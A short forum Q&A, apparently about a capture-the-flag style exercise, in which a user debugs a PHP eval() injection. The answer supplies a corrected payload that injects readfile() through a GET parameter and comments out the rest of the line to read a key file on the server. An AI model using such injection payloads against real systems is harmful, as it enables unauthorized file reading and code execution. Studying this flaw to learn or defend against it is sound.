# Eval Exploitation Payload

Tags: php, exploit, vulnerability

I've got a basic PHP program that runs eval() and I'm trying to exploit it to read a file on the server. The program is:

```
$x=$_GET['x'];
$y=$_GET['y'];
$z=$_GET['z']; 
echo eval("echo $x * $y / $z;");
```

The payload I believed would work is:

```
test.php?x=readfile("eval/key.txt");\");//&y=5&z=7
```

However I just receive a HTTP 500 error which I believe is a syntax error somewhere.

Can anyone point me where I've gone wrong?

Thanks!

Answer (score 1):

Try removing the `eval` when you test it, to see what command is being run:

```
echo readfile("eval/key.txt");\");// * 5 / 7;
```

Do you see what went wrong? You're trying to escape the `"` and close the `eval` with `);`, but that's not part of what `eval` is actually running. `eval` is only evaluating `echo $x * $y / $z;`.

If you try `readfile("eval/key.txt");//` for `$x` you'll have better luck:

```
echo readfile("eval/key.txt");// * 5 / 7;
```

Comment: Ahh! It seems so obvious once you know! Thanks very much.